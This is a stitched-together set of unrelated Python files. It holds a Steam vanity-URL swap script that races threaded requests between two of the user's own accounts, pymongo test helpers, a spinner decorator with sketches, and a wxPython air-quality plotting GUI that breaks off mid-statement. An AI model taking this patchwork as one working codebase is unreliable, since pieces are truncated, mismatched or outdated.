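# Dependency-free sketch of the background-spinner decorator pattern.
import itertools
import threading
import time
from functools import wraps

def spinner(text='Loading', speed=0.1):
    def decorator(func):
        @wraps(func)
        def wrapper(*args, **kwargs):
            stop = threading.Event()

            def run():
                # Cycle placeholder frames until asked to stop.
                for ch in itertools.cycle('|/-\\'):
                    if stop.is_set():
                        break
                    print(f'\r{text} {ch}', end='', flush=True)
                    time.sleep(speed)
                print('\r', end='', flush=True)

            t = threading.Thread(target=run, daemon=True)
            t.start()
            try:
                return func(*args, **kwargs)
            finally:
                stop.set()
                t.join()
        return wrapper
    return decorator

@spinner(text='Working')
def slow_task():
    time.sleep(2)
    return 'done'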
claim.py
import ast
import json
import logging
import os
import random
import sys
import time

import requests
from steamapi import SteamCommunity
from threading import Thread
from functools import wraps


def run_async(func):
    @wraps(func)
    def async_func(*args, **kwargs):
        func_hl = Thread(target=func, args=args, kwargs=kwargs)
        func_hl.start()
        return func_hl
    return async_func


logging.basicConfig(level=getattr(logging, "INFO"),
                    format="%(msecs)03d MS - %(message)s",
                    datefmt="%H:%M:%S %p")
log = logging.getLogger(__name__)

USER_AGENT = "Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Mobile Safari/537.36"

USERNAME = input("Steam Username (account releasing /id/): ")
PASSWORD = input("Steam Password (account releasing /id/): ")
release_account = SteamCommunity(username=USERNAME, password=PASSWORD, user_agent=USER_AGENT)

print("\n")

CLAIM_ACCOUNT_USERNAME = input("Steam Username (account claiming /id/): ")
CLAIM_ACCOUNT_PASSWORD = input("Steam Password (account claiming /id/): ")
claim_account = SteamCommunity(username=CLAIM_ACCOUNT_USERNAME, password=CLAIM_ACCOUNT_PASSWORD, user_agent=USER_AGENT)

vanity_url = release_account.vanity_url
release_id_url = f"https://steamcommunity.com/profiles/{release_account.steamid64}/edit?sessionID={release_account.sessionid}&type=profileSave&customURL="
claim_id_url = f"https://steamcommunity.com/profiles/{claim_account.steamid64}/edit?sessionID={claim_account.sessionid}&type=profileSave&customURL={vanity_url}"

log.info(f"The Vanity URL that will be swapped is /id/{vanity_url} from {release_account.steamid64} to {claim_account.steamid64}")
confirmation = input("Confirm (y/n): ")
if confirmation.lower().startswith("y"):
    log.info("Swapping in 3 seconds...")
else:
    log.info("Exiting script...")
    quit()

for i in range(3, 0, -1):
    print(str(i) + "...", end="\r")
    time.sleep(1)

grabbed = False


@run_async
def func1(sleep):
    global grabbed
    time.sleep(sleep)
    log.info(f"Attempting to claim {vanity_url} - {sleep} sleep version")
    if f"/id/{vanity_url}" in claim_account._session.get(claim_id_url).text:
        if grabbed is False:
            grabbed = True
            log.info(f"{sleep} sleep version grabbed it!")


func1(sleep=0.700)
func1(sleep=0.540)
func1(sleep=0.480)
func1(sleep=0.430)
func1(sleep=0.375)
func1(sleep=0.325)
func1(sleep=0.275)
func1(sleep=0.220)
func1(sleep=0.175)
func1(sleep=0.125)

log.info(f"Releasing /id/{vanity_url}")
release_account._session.get(release_id_url)
log.info(f"Released /id/{vanity_url}")

if claim_account.vanity_url == vanity_url:
    log.info(f"Successfully swapped /id/{vanity_url} from {release_account.steamid64} to {claim_account.steamid64}")
else:
    log.info(f"Failed to swap /id/{vanity_url}")

quit()
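
claim.py relies on a staggered race: several threads issue the same claim request with different delays timed around the instant the vanity URL is released, and the first success wins. Here is a generic sketch of that pattern under the same delay schedule; try_claim is a placeholder for the actual HTTP call, not part of the original script:

# Generic sketch of the staggered-race pattern used by claim.py.
import threading
import time

def race_claim(try_claim,
               delays=(0.700, 0.540, 0.480, 0.430, 0.375,
                       0.325, 0.275, 0.220, 0.175, 0.125)):
    winner = {}
    lock = threading.Lock()

    def attempt(delay):
        time.sleep(delay)
        if try_claim():
            with lock:
                # Only the first successful attempt is recorded.
                winner.setdefault('delay', delay)

    threads = [threading.Thread(target=attempt, args=(d,)) for d in delays]
    for t in threads:
        t.start()
    for t in threads:
        t.join()
    return winner.get('delay')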
utils.py
# Copyright 2012-present MongoDB, Inc. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """Utilities for testing pymongo """ import collections import contextlib import functools import os import re import sys import threading import time import warnings from collections import defaultdict from functools import partial from bson import json_util, py3compat from bson.objectid import ObjectId from pymongo import (MongoClient, monitoring) from pymongo.errors import ConfigurationError, OperationFailure from pymongo.monitoring import _SENSITIVE_COMMANDS, ConnectionPoolListener from pymongo.read_concern import ReadConcern from pymongo.read_preferences import ReadPreference from pymongo.server_selectors import (any_server_selector, writable_server_selector) from pymongo.write_concern import WriteConcern from test import (client_context, db_user, db_pwd) from test.utils_selection_tests import parse_read_preference IMPOSSIBLE_WRITE_CONCERN = WriteConcern(w=1000) class WhiteListEventListener(monitoring.CommandListener): def __init__(self, *commands): self.commands = set(commands) self.results = defaultdict(list) def started(self, event): if event.command_name in self.commands: self.results['started'].append(event) def succeeded(self, event): if event.command_name in self.commands: self.results['succeeded'].append(event) def failed(self, event): if event.command_name in self.commands: self.results['failed'].append(event) class CMAPListener(ConnectionPoolListener): def __init__(self): self.events = [] def reset(self): self.events = [] def add_event(self, event): self.events.append(event) def event_count(self, event_type): return len([event for event in self.events[:] if isinstance(event, event_type)]) def connection_created(self, event): self.add_event(event) def connection_ready(self, event): self.add_event(event) def connection_closed(self, event): self.add_event(event) def connection_check_out_started(self, event): self.add_event(event) def connection_check_out_failed(self, event): self.add_event(event) def connection_checked_out(self, event): self.add_event(event) def connection_checked_in(self, event): self.add_event(event) def pool_created(self, event): self.add_event(event) def pool_cleared(self, event): self.add_event(event) def pool_closed(self, event): self.add_event(event) class EventListener(monitoring.CommandListener): def __init__(self): self.results = defaultdict(list) def started(self, event): self.results['started'].append(event) def succeeded(self, event): self.results['succeeded'].append(event) def failed(self, event): self.results['failed'].append(event) def started_command_names(self): """Return list of command names started.""" return [event.command_name for event in self.results['started']] def reset(self): """Reset the state of this listener.""" self.results.clear() class OvertCommandListener(EventListener): """A CommandListener that ignores sensitive commands.""" def started(self, event): if event.command_name.lower() not in _SENSITIVE_COMMANDS: super(OvertCommandListener, self).started(event) 
def succeeded(self, event): if event.command_name.lower() not in _SENSITIVE_COMMANDS: super(OvertCommandListener, self).succeeded(event) def failed(self, event): if event.command_name.lower() not in _SENSITIVE_COMMANDS: super(OvertCommandListener, self).failed(event) class ServerAndTopologyEventListener(monitoring.ServerListener, monitoring.TopologyListener): """Listens to all events.""" def __init__(self): self.results = [] def opened(self, event): self.results.append(event) def description_changed(self, event): self.results.append(event) def closed(self, event): self.results.append(event) class HeartbeatEventListener(monitoring.ServerHeartbeatListener): """Listens to only server heartbeat events.""" def __init__(self): self.results = [] def started(self, event): self.results.append(event) def succeeded(self, event): self.results.append(event) def failed(self, event): self.results.append(event) class ScenarioDict(dict): """Dict that returns {} for any unknown key, recursively.""" def __init__(self, data): def convert(v): if isinstance(v, collections.Mapping): return ScenarioDict(v) if isinstance(v, (py3compat.string_type, bytes)): return v if isinstance(v, collections.Sequence): return [convert(item) for item in v] return v dict.__init__(self, [(k, convert(v)) for k, v in data.items()]) def __getitem__(self, item): try: return dict.__getitem__(self, item) except KeyError: # Unlike a defaultdict, don't set the key, just return a dict. return ScenarioDict({}) class CompareType(object): """Class that compares equal to any object of the given type.""" def __init__(self, type): self.type = type def __eq__(self, other): return isinstance(other, self.type) def __ne__(self, other): """Needed for Python 2.""" return not self.__eq__(other) class FunctionCallRecorder(object): """Utility class to wrap a callable and record its invocations.""" def __init__(self, function): self._function = function self._call_list = [] def __call__(self, *args, **kwargs): self._call_list.append((args, kwargs)) return self._function(*args, **kwargs) def reset(self): """Wipes the call list.""" self._call_list = [] def call_list(self): """Returns a copy of the call list.""" return self._call_list[:] @property def call_count(self): """Returns the number of times the function has been called.""" return len(self._call_list) class TestCreator(object): """Class to create test cases from specifications.""" def __init__(self, create_test, test_class, test_path): """Create a TestCreator object. :Parameters: - `create_test`: callback that returns a test case. The callback must accept the following arguments - a dictionary containing the entire test specification (the `scenario_def`), a dictionary containing the specification for which the test case will be generated (the `test_def`). - `test_class`: the unittest.TestCase class in which to create the test case. - `test_path`: path to the directory containing the JSON files with the test specifications. 
""" self._create_test = create_test self._test_class = test_class self.test_path = test_path def _ensure_min_max_server_version(self, scenario_def, method): """Test modifier that enforces a version range for the server on a test case.""" if 'minServerVersion' in scenario_def: min_ver = tuple( int(elt) for elt in scenario_def['minServerVersion'].split('.')) if min_ver is not None: method = client_context.require_version_min(*min_ver)(method) if 'maxServerVersion' in scenario_def: max_ver = tuple( int(elt) for elt in scenario_def['maxServerVersion'].split('.')) if max_ver is not None: method = client_context.require_version_max(*max_ver)(method) return method @staticmethod def valid_topology(run_on_req): return client_context.is_topology_type( run_on_req.get('topology', ['single', 'replicaset', 'sharded'])) @staticmethod def min_server_version(run_on_req): version = run_on_req.get('minServerVersion') if version: min_ver = tuple(int(elt) for elt in version.split('.')) return client_context.version >= min_ver return True @staticmethod def max_server_version(run_on_req): version = run_on_req.get('maxServerVersion') if version: max_ver = tuple(int(elt) for elt in version.split('.')) return client_context.version <= max_ver return True def should_run_on(self, scenario_def): run_on = scenario_def.get('runOn', []) if not run_on: # Always run these tests. return True for req in run_on: if (self.valid_topology(req) and self.min_server_version(req) and self.max_server_version(req)): return True return False def ensure_run_on(self, scenario_def, method): """Test modifier that enforces a 'runOn' on a test case.""" return client_context._require( lambda: self.should_run_on(scenario_def), "runOn not satisfied", method) def tests(self, scenario_def): """Allow CMAP spec test to override the location of test.""" return scenario_def['tests'] def create_tests(self): for dirpath, _, filenames in os.walk(self.test_path): dirname = os.path.split(dirpath)[-1] for filename in filenames: with open(os.path.join(dirpath, filename)) as scenario_stream: # Use tz_aware=False to match how CodecOptions decodes # dates. opts = json_util.JSONOptions(tz_aware=False) scenario_def = ScenarioDict( json_util.loads(scenario_stream.read(), json_options=opts)) test_type = os.path.splitext(filename)[0] # Construct test from scenario. 
for test_def in self.tests(scenario_def): test_name = 'test_%s_%s_%s' % ( dirname, test_type.replace("-", "_").replace('.', '_'), str(test_def['description'].replace(" ", "_").replace( '.', '_'))) new_test = self._create_test( scenario_def, test_def, test_name) new_test = self._ensure_min_max_server_version( scenario_def, new_test) new_test = self.ensure_run_on( scenario_def, new_test) new_test.__name__ = test_name setattr(self._test_class, new_test.__name__, new_test) def _connection_string(h, authenticate): if h.startswith("mongodb://"): return h elif client_context.auth_enabled and authenticate: return "mongodb://%s:%s@%s" % (db_user, db_pwd, str(h)) else: return "mongodb://%s" % (str(h),) def _mongo_client(host, port, authenticate=True, direct=False, **kwargs): """Create a new client over SSL/TLS if necessary.""" host = host or client_context.host port = port or client_context.port client_options = client_context.default_client_options.copy() if client_context.replica_set_name and not direct: client_options['replicaSet'] = client_context.replica_set_name client_options.update(kwargs) client = MongoClient(_connection_string(host, authenticate), port, **client_options) return client def single_client_noauth(h=None, p=None, **kwargs): """Make a direct connection. Don't authenticate.""" return _mongo_client(h, p, authenticate=False, direct=True, **kwargs) def single_client(h=None, p=None, **kwargs): """Make a direct connection, and authenticate if necessary.""" return _mongo_client(h, p, direct=True, **kwargs) def rs_client_noauth(h=None, p=None, **kwargs): """Connect to the replica set. Don't authenticate.""" return _mongo_client(h, p, authenticate=False, **kwargs) def rs_client(h=None, p=None, **kwargs): """Connect to the replica set and authenticate if necessary.""" return _mongo_client(h, p, **kwargs) def rs_or_single_client_noauth(h=None, p=None, **kwargs): """Connect to the replica set if there is one, otherwise the standalone. Like rs_or_single_client, but does not authenticate. """ return _mongo_client(h, p, authenticate=False, **kwargs) def rs_or_single_client(h=None, p=None, **kwargs): """Connect to the replica set if there is one, otherwise the standalone. Authenticates if necessary. """ return _mongo_client(h, p, **kwargs) def ensure_all_connected(client): """Ensure that the client's connection pool has socket connections to all members of a replica set. Raises ConfigurationError when called with a non-replica set client. Depending on the use-case, the caller may need to clear any event listeners that are configured on the client. """ ismaster = client.admin.command("isMaster") if 'setName' not in ismaster: raise ConfigurationError("cluster is not a replica set") target_host_list = set(ismaster['hosts']) connected_host_list = set([ismaster['me']]) admindb = client.get_database('admin') # Run isMaster until we have connected to each host at least once. while connected_host_list != target_host_list: ismaster = admindb.command("isMaster", read_preference=ReadPreference.SECONDARY) connected_host_list.update([ismaster["me"]]) def one(s): """Get one element of a set""" return next(iter(s)) def oid_generated_on_process(oid): """Makes a determination as to whether the given ObjectId was generated by the current process, based on the 5-byte random number in the ObjectId. 
""" return ObjectId._random() == oid.binary[4:9] def delay(sec): return '''function() { sleep(%f * 1000); return true; }''' % sec def get_command_line(client): command_line = client.admin.command('getCmdLineOpts') assert command_line['ok'] == 1, "getCmdLineOpts() failed" return command_line def camel_to_snake(camel): # Regex to convert CamelCase to snake_case. snake = re.sub('(.)([A-Z][a-z]+)', r'\1_\2', camel) return re.sub('([a-z0-9])([A-Z])', r'\1_\2', snake).lower() def camel_to_upper_camel(camel): return camel[0].upper() + camel[1:] def camel_to_snake_args(arguments): for arg_name in list(arguments): c2s = camel_to_snake(arg_name) arguments[c2s] = arguments.pop(arg_name) return arguments def parse_collection_options(opts): if 'readPreference' in opts: opts['read_preference'] = parse_read_preference( opts.pop('readPreference')) if 'writeConcern' in opts: opts['write_concern'] = WriteConcern( **dict(opts.pop('writeConcern'))) if 'readConcern' in opts: opts['read_concern'] = ReadConcern( **dict(opts.pop('readConcern'))) return opts def server_started_with_option(client, cmdline_opt, config_opt): """Check if the server was started with a particular option. :Parameters: - `cmdline_opt`: The command line option (i.e. --nojournal) - `config_opt`: The config file option (i.e. nojournal) """ command_line = get_command_line(client) if 'parsed' in command_line: parsed = command_line['parsed'] if config_opt in parsed: return parsed[config_opt] argv = command_line['argv'] return cmdline_opt in argv def server_started_with_auth(client): try: command_line = get_command_line(client) except OperationFailure as e: msg = e.details.get('errmsg', '') if e.code == 13 or 'unauthorized' in msg or 'login' in msg: # Unauthorized. return True raise # MongoDB >= 2.0 if 'parsed' in command_line: parsed = command_line['parsed'] # MongoDB >= 2.6 if 'security' in parsed: security = parsed['security'] # >= rc3 if 'authorization' in security: return security['authorization'] == 'enabled' # < rc3 return security.get('auth', False) or bool(security.get('keyFile')) return parsed.get('auth', False) or bool(parsed.get('keyFile')) # Legacy argv = command_line['argv'] return '--auth' in argv or '--keyFile' in argv def server_started_with_nojournal(client): command_line = get_command_line(client) # MongoDB 2.6. if 'parsed' in command_line: parsed = command_line['parsed'] if 'storage' in parsed: storage = parsed['storage'] if 'journal' in storage: return not storage['journal']['enabled'] return server_started_with_option(client, '--nojournal', 'nojournal') def server_is_master_with_slave(client): command_line = get_command_line(client) if 'parsed' in command_line: return command_line['parsed'].get('master', False) return '--master' in command_line['argv'] def drop_collections(db): # Drop all non-system collections in this database. for coll in db.list_collection_names( filter={"name": {"$regex": r"^(?!system\.)"}}): db.drop_collection(coll) def remove_all_users(db): db.command("dropAllUsersFromDatabase", 1, writeConcern={"w": client_context.w}) def joinall(threads): """Join threads with a 5-minute timeout, assert joins succeeded""" for t in threads: t.join(300) assert not t.isAlive(), "Thread %s hung" % t def connected(client): """Convenience to wait for a newly-constructed client to connect.""" with warnings.catch_warnings(): # Ignore warning that "ismaster" is always routed to primary even # if client's read preference isn't PRIMARY. 
warnings.simplefilter("ignore", UserWarning) client.admin.command('ismaster') # Force connection. return client def wait_until(predicate, success_description, timeout=10): """Wait up to 10 seconds (by default) for predicate to be true. E.g.: wait_until(lambda: client.primary == ('a', 1), 'connect to the primary') If the lambda-expression isn't true after 10 seconds, we raise AssertionError("Didn't ever connect to the primary"). Returns the predicate's first true value. """ start = time.time() interval = min(float(timeout)/100, 0.1) while True: retval = predicate() if retval: return retval if time.time() - start > timeout: raise AssertionError("Didn't ever %s" % success_description) time.sleep(interval) def is_mongos(client): res = client.admin.command('ismaster') return res.get('msg', '') == 'isdbgrid' def assertRaisesExactly(cls, fn, *args, **kwargs): """ Unlike the standard assertRaises, this checks that a function raises a specific class of exception, and not a subclass. E.g., check that MongoClient() raises ConnectionFailure but not its subclass, AutoReconnect. """ try: fn(*args, **kwargs) except Exception as e: assert e.__class__ == cls, "got %s, expected %s" % ( e.__class__.__name__, cls.__name__) else: raise AssertionError("%s not raised" % cls) @contextlib.contextmanager def _ignore_deprecations(): with warnings.catch_warnings(): warnings.simplefilter("ignore", DeprecationWarning) yield def ignore_deprecations(wrapped=None): """A context manager or a decorator.""" if wrapped: @functools.wraps(wrapped) def wrapper(*args, **kwargs): with _ignore_deprecations(): return wrapped(*args, **kwargs) return wrapper else: return _ignore_deprecations() class DeprecationFilter(object): def __init__(self, action="ignore"): """Start filtering deprecations.""" self.warn_context = warnings.catch_warnings() self.warn_context.__enter__() warnings.simplefilter(action, DeprecationWarning) def stop(self): """Stop filtering deprecations.""" self.warn_context.__exit__() self.warn_context = None def get_pool(client): """Get the standalone, primary, or mongos pool.""" topology = client._get_topology() server = topology.select_server(writable_server_selector) return server.pool def get_pools(client): """Get all pools.""" return [ server.pool for server in client._get_topology().select_servers(any_server_selector)] # Constants for run_threads and lazy_client_trial. NTRIALS = 5 NTHREADS = 10 def run_threads(collection, target): """Run a target function in many threads. target is a function taking a Collection and an integer. """ threads = [] for i in range(NTHREADS): bound_target = partial(target, collection, i) threads.append(threading.Thread(target=bound_target)) for t in threads: t.start() for t in threads: t.join(60) assert not t.isAlive() @contextlib.contextmanager def frequent_thread_switches(): """Make concurrency bugs more likely to manifest.""" interval = None if not sys.platform.startswith('java'): if hasattr(sys, 'getswitchinterval'): interval = sys.getswitchinterval() sys.setswitchinterval(1e-6) else: interval = sys.getcheckinterval() sys.setcheckinterval(1) try: yield finally: if not sys.platform.startswith('java'): if hasattr(sys, 'setswitchinterval'): sys.setswitchinterval(interval) else: sys.setcheckinterval(interval) def lazy_client_trial(reset, target, test, get_client): """Test concurrent operations on a lazily-connecting client. `reset` takes a collection and resets it for the next trial. 
`target` takes a lazily-connecting collection and an index from 0 to NTHREADS, and performs some operation, e.g. an insert. `test` takes the lazily-connecting collection and asserts a post-condition to prove `target` succeeded. """ collection = client_context.client.pymongo_test.test with frequent_thread_switches(): for i in range(NTRIALS): reset(collection) lazy_client = get_client() lazy_collection = lazy_client.pymongo_test.test run_threads(lazy_collection, target) test(lazy_collection) def gevent_monkey_patched(): """Check if gevent's monkey patching is active.""" # In Python 3.6 importing gevent.socket raises an ImportWarning. with warnings.catch_warnings(): warnings.simplefilter("ignore", ImportWarning) try: import socket import gevent.socket return socket.socket is gevent.socket.socket except ImportError: return False def eventlet_monkey_patched(): """Check if eventlet's monkey patching is active.""" try: import threading import eventlet return (threading.current_thread.__module__ == 'eventlet.green.threading') except ImportError: return False def is_greenthread_patched(): return gevent_monkey_patched() or eventlet_monkey_patched() def disable_replication(client): """Disable replication on all secondaries, requires MongoDB 3.2.""" for host, port in client.secondaries: secondary = single_client(host, port) secondary.admin.command('configureFailPoint', 'stopReplProducer', mode='alwaysOn') def enable_replication(client): """Enable replication on all secondaries, requires MongoDB 3.2.""" for host, port in client.secondaries: secondary = single_client(host, port) secondary.admin.command('configureFailPoint', 'stopReplProducer', mode='off') class ExceptionCatchingThread(threading.Thread): """A thread that stores any exception encountered from run().""" def __init__(self, *args, **kwargs): self.exc = None super(ExceptionCatchingThread, self).__init__(*args, **kwargs) def run(self): try: super(ExceptionCatchingThread, self).run() except BaseException as exc: self.exc = exc raise
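
TestCreator above turns JSON specifications into unittest methods by building one closure per test case and attaching it to the TestCase class with setattr. A minimal, self-contained analogue of that pattern, using inline specs as stand-ins for the JSON files:

# Minimal analogue of the spec-driven test generation done by TestCreator.
import unittest

SPECS = [
    {'description': 'one plus one', 'input': (1, 1), 'expected': 2},
    {'description': 'two plus three', 'input': (2, 3), 'expected': 5},
]

class GeneratedTests(unittest.TestCase):
    pass

def create_test(spec):
    # Capture the spec in a closure so each generated method checks its own case.
    def run_test(self):
        a, b = spec['input']
        self.assertEqual(a + b, spec['expected'])
    return run_test

for spec in SPECS:
    name = 'test_%s' % spec['description'].replace(' ', '_')
    test = create_test(spec)
    test.__name__ = name
    setattr(GeneratedTests, name, test)

if __name__ == '__main__':
    unittest.main()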
myAQIGUI.py
#!/usr/bin/env python # -*- coding: utf-8 -*- ########################################################################### ## Python code generated with wxFormBuilder (version Jun 17 2015) ## http://www.wxformbuilder.org/ ## ## PLEASE DO "NOT" EDIT THIS FILE! ########################################################################### import wx import wx.xrc from wx.lib.newevent import NewCommandEvent TimerChangeEvent, EVT_TIMER_CHANGE = NewCommandEvent() DisplayUpdate, EVT_DISP_UPDATE = wx.lib.newevent.NewEvent() import numpy as np import matplotlib from matplotlib import dates from datetime import datetime,timedelta import time # matplotlib采用WXAgg为后台,将matplotlib嵌入wxPython中 matplotlib.use("WXAgg") from matplotlib.backends.backend_wxagg import FigureCanvasWxAgg as FigureCanvas from matplotlib.backends.backend_wxagg import NavigationToolbar2WxAgg as NavigationToolbar from matplotlib.ticker import MultipleLocator, FuncFormatter import pylab from matplotlib import pyplot import dataCollect from Queue import Queue, Empty from threading import Thread EVENT_TIMER = 'eTimer' ########################################################################### ## Event type ########################################################################### class Event(object): #---------------------------------------------------------------------- def __init__(self, handle, type_=None): """Constructor""" self.handle = handle self.type_ = type_ class MainFrame ( wx.Frame ): def __init__( self, parent ): wx.Frame.__init__ ( self, parent, id = wx.ID_ANY, title = u"MyAQI", \ pos = wx.DefaultPosition, size = wx.Size( 800,400 ), style = wx.DEFAULT_FRAME_STYLE|wx.TAB_TRAVERSAL ) ##################################################### # Manual Add Code self.dpi = 100 # self.Figure = matplotlib.figure.Figure(figsize=(10,3), dpi=self.dpi) self.Figure = matplotlib.figure.Figure(figsize=(50,30)) self.Figure.set_facecolor('white') # self.axes = self.Figure.add_axes([0.1,0.1,0.8,0.8]) self.axes25 = self.Figure.add_subplot(111) self.axes10 = self.axes25.twinx() self.FigureCanvas = FigureCanvas(self,-1,self.Figure) ##################################################### self.SetSizeHintsSz( wx.DefaultSize, wx.DefaultSize ) self.SetBackgroundColour( wx.SystemSettings.GetColour( wx.SYS_COLOUR_WINDOW ) ) # self.SetForegroundColour( wx.SystemSettings.GetColour( wx.SYS_COLOUR_WINDOW ) ) MainSizer = wx.FlexGridSizer( 1, 3, 0, 0 ) MainSizer.SetFlexibleDirection( wx.BOTH ) MainSizer.SetNonFlexibleGrowMode( wx.FLEX_GROWMODE_ALL ) leftSizer = wx.FlexGridSizer( 11, 1, 0, 0 ) leftSizer.SetFlexibleDirection( wx.BOTH ) leftSizer.SetNonFlexibleGrowMode( wx.FLEX_GROWMODE_ALL ) self.m_staticText1 = wx.StaticText( self, wx.ID_ANY, wx.EmptyString, wx.DefaultPosition, wx.DefaultSize, 0 ) self.m_staticText1.Wrap( -1 ) leftSizer.Add( self.m_staticText1, 0, wx.ALL | wx.EXPAND, 5 ) self.m_btn_start = wx.Button( self, wx.ID_ANY, u"Start", wx.DefaultPosition, wx.DefaultSize, 0 ) leftSizer.Add( self.m_btn_start, 0, wx.ALL | wx.EXPAND, 5 ) self.m_staticText2 = wx.StaticText( self, wx.ID_ANY, wx.EmptyString, wx.DefaultPosition, wx.DefaultSize, 0 ) self.m_staticText2.Wrap( -1 ) leftSizer.Add( self.m_staticText2, 0, wx.ALL | wx.EXPAND, 5 ) self.m_btn_stop = wx.Button( self, wx.ID_ANY, u"Stop", wx.DefaultPosition, wx.DefaultSize, 0 ) leftSizer.Add( self.m_btn_stop, 0, wx.ALL | wx.EXPAND, 5 ) self.m_staticText3 = wx.StaticText( self, wx.ID_ANY, wx.EmptyString, wx.DefaultPosition, wx.DefaultSize, 0 ) self.m_staticText3.Wrap( -1 ) leftSizer.Add( self.m_staticText3, 0, 
wx.ALL | wx.EXPAND, 5 ) self.m_btn_quit = wx.Button( self, wx.ID_ANY, u"Quit", wx.DefaultPosition, wx.DefaultSize, 0 ) leftSizer.Add( self.m_btn_quit, 0, wx.ALL | wx.EXPAND, 5 ) self.m_staticText4 = wx.StaticText( self, wx.ID_ANY, wx.EmptyString, wx.DefaultPosition, wx.DefaultSize, 0 ) self.m_staticText4.Wrap( -1 ) leftSizer.Add( self.m_staticText4, 0, wx.ALL | wx.EXPAND, 5 ) self.m__staticPM25label = wx.StaticText( self, wx.ID_ANY, u"PM2.5", wx.DefaultPosition, wx.DefaultSize, 0 ) self.m__staticPM25label.Wrap( -1 ) leftSizer.Add( self.m__staticPM25label, 0, wx.ALL, 5 ) self.m_textPM25 = wx.TextCtrl( self, wx.ID_ANY, wx.EmptyString, wx.DefaultPosition, wx.Size( 40,-1 ), style =wx.TE_RIGHT ) leftSizer.Add( self.m_textPM25, 0, wx.ALL, 5 ) self.m_staticPM10label = wx.StaticText( self, wx.ID_ANY, u"PM10", wx.DefaultPosition, wx.DefaultSize, 0 ) self.m_staticPM10label.Wrap( -1 ) leftSizer.Add( self.m_staticPM10label, 0, wx.ALL, 5 ) self.m_textPM10 = wx.TextCtrl( self, wx.ID_ANY, wx.EmptyString, wx.DefaultPosition, wx.Size( 40,-1 ), style =wx.TE_RIGHT ) leftSizer.Add( self.m_textPM10, 0, wx.ALL, 5 ) MainSizer.Add( leftSizer, 1, wx.ALL | wx.EXPAND, 5 ) self.m_staticline1 = wx.StaticLine( self, wx.ID_ANY, wx.DefaultPosition, wx.DefaultSize, wx.LI_VERTICAL ) MainSizer.Add( self.m_staticline1, 0, wx.EXPAND | wx.ALL, 5 ) MainSizer.Add(self.FigureCanvas,proportion =-10, border = 2,flag = wx.ALL | wx.GROW) self.SetSizer( MainSizer ) self.Layout() self.timer = wx.Timer() self.timer.SetOwner( self, wx.ID_ANY ) self.Centre( wx.BOTH ) # Connect Events self.m_btn_start.Bind( wx.EVT_BUTTON, self.onStart ) self.m_btn_stop.Bind( wx.EVT_BUTTON, self.onStop ) self.m_btn_quit.Bind( wx.EVT_BUTTON, self.onQuit ) self.Bind( wx.EVT_TIMER, self.onTimer, id=wx.ID_ANY ) # Timer event self.Bind(EVT_TIMER_CHANGE, self.onChangeTimer) #customer event self.Bind(EVT_DISP_UPDATE, self.onDisplayUpdate) # Create object for AQI data self.tickerData = dataCollect.AQIdata2() # initial plot the graphy here, only need to update data later # self.plot(self.tickerData.xTicker,self.tickerData.y25Ticker, '--+r', self.tickerData.xTicker,self.tickerData.y10Ticker,'--*g') self.plot_data25 = self.axes25.plot(self.tickerData.xTicker,self.tickerData.y25Ticker,'-sr')[0] self.plot_data10 = self.axes10.plot(self.tickerData.xTicker,self.tickerData.y10Ticker,'-dg')[0] self.axes25.set_axis_bgcolor('gray') self.axes25.set_ybound(lower=0, upper=500) self.axes10.set_ybound(lower=0, upper=500) # hfmt = dates.DateFormatter('%m/%d %H:%M') hfmt = dates.DateFormatter('%H:%M') # self.axes25.xaxis.set_major_locator(dates.MinuteLocator()) self.axes25.xaxis.set_major_locator(dates.HourLocator()) self.axes25.xaxis.set_major_formatter(hfmt) # self.axes10.xaxis.set_major_locator(dates.MinuteLocator()) self.axes25.xaxis.set_major_locator(dates.HourLocator()) self.axes10.xaxis.set_major_formatter(hfmt) # self.axes25.get_xticklabels(), fontsize=8) # self.axes25.get_yticklabels(), fontsize=8) # self.axes10.get_xticklabels(), fontsize=8) # self.axes10.get_yticklabels(), fontsize=8) self.sleepTime = 10 # 10 second delay self.maxDatalen = 100000 #max 10E5 point self.__queue = Queue() self.__active = False def __del__( self ): self.timer.Stop() if self.__active == True: self.__active = False self.__thread.join() # Virtual event handlers, overide them in your derived class def onStart( self, event ): self.__Start() def __Start(self): self.timer.Start(self.sleepTime) if self.__active == False: self.__thread = Thread(target = self.__run) self.__active = True 
self.__thread.start() def onStop( self, event ): self.__Stop() def __Stop(self): self.timer.Stop() if self.__active == True: self.__active = False self.__thread.join() def post_timer_change_event(self, value): ''' create a change timer event ''' evt = TimerChangeEvent(self.Id, value=value) wx.PostEvent(self, evt) def onChangeTimer(self, event): value = event.value self.timer.Start(value) def onQuit( self, event ): self.timer.Stop() if self.__active == True: self.__active = False self.__thread.join() self.Close() def onTimer( self, event ): event_ = Event(self.updateGraphy, type_=EVENT_TIMER) self.__queue.put(event_) def updateGraphy(self): evt = DisplayUpdate() wx.PostEvent(self, evt) def onDisplayUpdate(self, event): nplen = len(self.tickerData.xTicker) if nplen>self.maxDatalen: for i in range((nplen/2)): self.tickerData.xTicker = np.delete(self.tickerData.xTicker, i+1, 0) self.tickerData.y25Ticker = np.delete(self.tickerData.y25Ticker, i+1, 0) self.tickerData.y10Ticker = np.delete(self.tickerData.y10Ticker, i+1, 0) self.sleepTime = self.sleepTime *2 self.post_timer_change_event(self.sleepTime) self.tickerData.updateElement(self.sleepTime) self.m_textPM10.SetValue(str(int(self.tickerData.y10Ticker[-1]))) self.m_textPM25.SetValue(str(int(self.tickerData.y25Ticker[-1]))) self.__plot() def __run(self): while self.__active == True: try: event_ = self.__queue.get(block = True, timeout = 1) self.__process(event_) except Empty: pass def __process(self, event_): event_.handle() def __plot(self,*args,**kwargs): '''update the plot here''' # how to change the x axis to time format dts = map(datetime.fromtimestamp, self.tickerData.xTicker) fds = dates.date2num(dts) # converted xmin = fds[0] xmax = fds[-1]+0.001 diff = dts[-1]-dts[0] ymin = 0 ymax = max(max(self.tickerData.y25Ticker), max(self.tickerData.y10Ticker))*1.5 self.axes25.set_xbound(lower=xmin, upper=xmax) self.axes25.set_ybound(lower=ymin, upper=ymax) self.axes10.set_xbound(lower=xmin, upper=xmax) self.axes10.set_ybound(lower=ymin, 